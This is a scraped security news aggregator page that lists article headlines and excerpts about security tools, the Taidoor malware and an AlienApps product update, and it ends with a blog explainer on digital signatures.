Now, we’ve streamlined the entire process by combining plug-ins and AlienApps into one framework. We have also simplified finding the right tool by combining redundant or overlapping ones. For example, some products previously had different plugins for handling different log formats. We’ve collapsed all these into one for the sake of simplicity, without any functional changes in event handling.
From a practical perspective, all AlienApps provide one or more of the following capabilities:
Data Collection - capable of collecting events from your environment, including processing syslog messages, retrieving from log aggregation services (such as CloudWatch Logs, or an S3 bucket) and polling API’s.
Response - will help your security team “do things” - or, as we say, orchestrate the response - by taking action to investigate or respond to threats. Examples include things like querying an agent for additional host telemetry, adding an IP or domain to a block list, or disabling a cloud service account.
Notification - help the SOC team be more productive by sending data to third party services and applications such as Jira, ServiceNow, or Box Notes. The most common use case here is opening a case in your existing workflow.
Head over to “Data Sources>Alien Apps” for a look at the new GUI. The apps currently in use will be shown on this page, along with some useful graphs about application use. If any of the apps have configuration errors, you’ll see a red bar along with information about what needs to be fixed. See figure 1.
To add new integrations to a USM deployment, click “available apps” and search for the vendor. This will reveal all the apps available for that vendor. Note that there can be more than one app per vendor - there is one for every product or product line, depending on how that vendor organizes their products. See figure 2 for an example.
Using Response and Notification Actions
Nothing has changed about how AlienApp response actions work. If you haven’t tried them before, manual response actions can be taken in the event or alarm view by clicking on an individual event or alarm, then clicking “Select Action”. This will bring up a series of dialogs asking you to select the AlienApp you’d like to use, along with other relevant information such as the IP address or host, and any fields needed such as the case name if you are opening a ticket. Once everything is configured, simply click “run” and the response action will be initiated |
Tool Threat | ||
|
2020-08-09 13:00:00 | A British AI Tool to Predict Violent Crime Is Too Flawed to Use (lien direct) | A government-funded system known as Most Serious Violence was built to predict first offenses but turned out to be wildly inaccurate. | Tool | ||
|
2020-08-08 07:00:08 | DEF CON: New tool brings back \'domain fronting\' as \'domain hiding\' (lien direct) | After Amazon and Google stopped supporting the censorship-evading domain fronting technique on their clouds in 2018, new Noctilucent toolkit aims to bring it back in a new form as "domain hiding." | Tool | ||
|
2020-08-06 15:32:17 | IBM creates an open source tool to simplify API documentation (lien direct) | OpenAPI Comment Parser for developers aims to make good API documentation easy to write and read. | Tool | ||
|
2020-08-03 16:45:00 | DHS Urges \'Highest Priority\' Attention on Old Chinese Malware Threat (lien direct) | "Taidoor" is a remote access tool that has been used in numerous cyber espionage campaigns since at least 2008. | Malware Tool Threat | ||
 |
2020-08-03 16:00:27 | How Employing Encryption for Data Security Changed History (lien direct) | Human history is full of examples of encryption playing pivotal roles in war, competition and transitions of power. Throughout recorded time, people have employed encryption as a tactical tool to keep information private. That data could involve military campaigns, plots to overthrow political leaders or political dealings. In some cases, the use of encryption actually resulted […] | Tool Guideline | ||
|
2020-08-03 15:00:08 | BlackBerry launches free tool for reverse engineering to fight cybersecurity attacks (lien direct) | One of the first announcements at BlackHat USA 2020 is an open-source tool to fight malware that BlackBerry first used internally and is now making available to everyone. | Malware Tool | ||
|
2020-08-03 15:00:06 | BlackBerry releases new security tool for reverse-engineering PE files (lien direct) | BlackBerry open-sources PE Tree, a new malware reverse-engineering tool for analyzing Portable Executable (PE) files. | Malware Tool | ||
|
2020-08-03 11:00:00 | (Déjà vu) Digital signatures security explained (lien direct) | This blog was written by an independent guest blogger. Digital signatures have been around for decades, but recent events have put them back in the spotlight. They were heralded as the future of cybersecurity as far back as 1999, but in the intervening years came to be somewhat taken for granted by security engineers. Not any longer: the massive move to home working precipitated by the Covid-19 pandemic have forced many to take a fresh look at the security value of digital signatures, why they matter, and their relationship to encryption. We thought we'd do the same. In this article, we'll give you a refresher course on how digital signatures work, why they are important for security, and what the future holds. How do digital signatures work? Digital signatures, at the most fundamental level, are mathematical algorithms used to validate the authenticity and integrity of an electronic message. This "message" could be an email, a credit card transaction, or a digital document. Digital signatures create a virtual "fingerprint" that is completely unique to a person (or other entity), and can therefore be used not just to protect the contents of messages, but also to ensure that they were written by who they claim to have been. At a deeper level, digital signatures work by applying a hash function to a message. In most cases, a user's private key will be used to create a "hash," which is a fixed-length string of numbers and letters. The way in which hash functions work means that this string is totally unique to the message being hashed. In addition, hash functions are also one-way functions — a computed hash cannot be reversed to find other files that may generate the same hash value. The most popular hashing algorithms in use today are Secure Hash Algorithm-1 (SHA-1), the Secure Hashing Algorithm-2 family (SHA-2 and SHA-256), and Message Digest 5 (MD5). The importance of digital signatures The value of digital signatures has been long recognized, but recent events have meant that they are being deployed at an unprecedented rate. This is because digital signatures afford the ability for users to securely communicate when working remotely – which more than half of US workers did even before the pandemic – without the need for a permanent, sustained encrypted connection. More specifically, digital signatures allow three factors about a message to be verified: Authentication. Because, in most implementations, digital signatures are created using the sender's private encryption key, it is possible to verify the identity of the message source. Data Integrity. Because hash functions produce a digital signature by looking at the entirety of a particular message, if any part of the message changes, so does the hash function. This means that if a message is intercepted in transit and changed, the digital certificate verification performed by the recipient fails. This means that the recipient has an easy way to check if data security has been breached. | Tool |
To see everything:
Our RSS (filtrered)
